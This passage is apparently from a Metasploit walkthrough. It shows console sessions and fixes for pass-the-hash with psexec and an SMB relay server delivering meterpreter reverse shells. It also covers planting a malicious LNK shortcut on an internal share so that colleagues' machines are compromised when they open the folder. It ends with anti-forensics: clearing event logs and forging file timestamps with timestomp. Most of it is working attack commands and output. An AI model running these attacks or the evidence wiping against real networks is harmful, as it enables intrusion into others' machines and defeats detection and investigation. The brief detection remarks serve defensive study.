For no obvious reason this returned nothing; after run it just sat there. Note that RHOSTS and PORTS were set while jtr_crack_fast was still the active module; after use auxiliary/scanner/portscan/tcp, run show options to confirm they carried over, and set THREADS, since a single-threaded scan of a /24 through a pivot takes a long time to produce anything.

Pass-the-hash with psexec:

msf exploit(psexec) > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.0.108:443
[*] Connecting to the server...
[*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
msf exploit(psexec) >

The failure is visible in the output: it authenticated as user ''. SMBUser was never set, so the Administrator's LM:NT hash was presented for an empty username. Set SMBUser Administrator (and SMBDomain if the account is a domain one) before exploit; psexec accepts the LM:NT pair in SMBPass in place of a password.
Chaining MS10-046 and MS08-068. First the malicious SMB server, smb_relay:

msf post(droplnk) > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show options
Module options (exploit/windows/smb/smb_relay):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SMBHOST                      no        The target SMB server (leave empty for originating system)
SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     445              yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(smb_relay) > set SRVHOST 192.168.0.108
SRVHOST => 192.168.0.108
msf exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.108:4444
[*] Server started.
msf exploit(smb_relay) >

SMBHOST is left empty, so whoever connects gets their authentication reflected back at themselves (the originating system). SRVPORT 445 must be free on the attacker's box, so a local Samba has to be stopped first.

MS10-046 in one paragraph: the bug is in shell32.dll, in the code Windows uses to load a shortcut's icon. When the icon is supplied by a DLL, a malicious LNK can be crafted that points at an attacker's DLL; the shell parses it without properly validating the parameters, so that DLL is loaded and executed.

The droplnk post module writes such a shortcut onto the target:

msf exploit(psexec) > use post/windows/escalate/droplnk
msf post(droplnk) > show options
Module options (post/windows/escalate/droplnk):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
ICONFILENAME  icon.png         yes       File name on LHOST's share
LHOST                          yes       Host listening for incoming SMB/WebDAV traffic
LNKFILENAME   Words.lnk        yes       Shortcut's filename
SESSION                        yes       The session to run this module on.
SHARENAME     share1           yes       Share name on LHOST
msf post(droplnk) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf post(droplnk) > set session 1
session => 1
msf post(droplnk) > exploit
[*] Creating evil LNK
[*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk
[*] Done. Wait for evil to happen..
[*] Post module execution completed
msf post(droplnk) >

Copy C:\Windows\system32\Words.lnk into a shared folder on the internal network and wait. When a colleague A opens that folder, MS10-046 fires: Explorer renders the shortcut's icon as soon as the folder is listed, nobody has to click anything. A's machine then reaches out to our SMB server at 192.168.0.108, and that is where MS08-068 comes in. The two bugs together: one look and the machine is owned.

A bit of history. Early SMB sent passwords over the network in the clear. Then came the LAN Manager challenge/response scheme, LM, which is so simple it is easily broken, so Microsoft introduced the Windows NT challenge/response scheme, NTLM. MS08-068 is a flaw in how SMB handled NTLM authentication: when the target connects to the attacker's malicious SMB server, the attacker holds the SMB response back and feeds the target's own challenge/response exchange back to it, so the target authenticates the attacker as itself. What gets relayed is the live challenge/response, not the stored password hash; the attacker never needs to know the password.
Covering tracks. Clear the event logs:

meterpreter > clearev
[*] Wiping 148 records from Application...
[*] Wiping 335 records from System...
[*] Wiping 0 records from Security...
meterpreter >

Clearing is itself loud: on XP, wiping the Security log writes event 517 ("The audit log was cleared") as the first entry of the fresh log, and a log that suddenly starts today with that entry is a stronger indicator than most of what was in it.

Forge timestamps with timestomp:

meterpreter > ls
Listing: c:\
============
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  0     fil   2013-12-07 16:44:55 +0800  1.txt.txt
100666/rw-rw-rw-  68    fil   2013-12-07 12:28:07 +0800  nimeia.txt
meterpreter > timestomp 1.txt.txt -f nimeia.txt
[*] Setting MACE attributes on 1.txt.txt from nimeia.txt
meterpreter > ls
Listing: c:\
============
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  0     fil   2013-12-07 12:28:07 +0800  1.txt.txt
100666/rw-rw-rw-  68    fil   2013-12-07 12:28:07 +0800  nimeia.txt
meterpreter >

-f copies all four MACE values (modified, accessed, created, MFT entry modified) from nimeia.txt onto 1.txt.txt; ls only shows the modified time, timestomp 1.txt.txt -v shows all four. The forged values live in the file's $STANDARD_INFORMATION attribute; the $FILE_NAME attribute in the MFT record is not touched, and a mismatch between the two is exactly how forensic tools spot timestomping.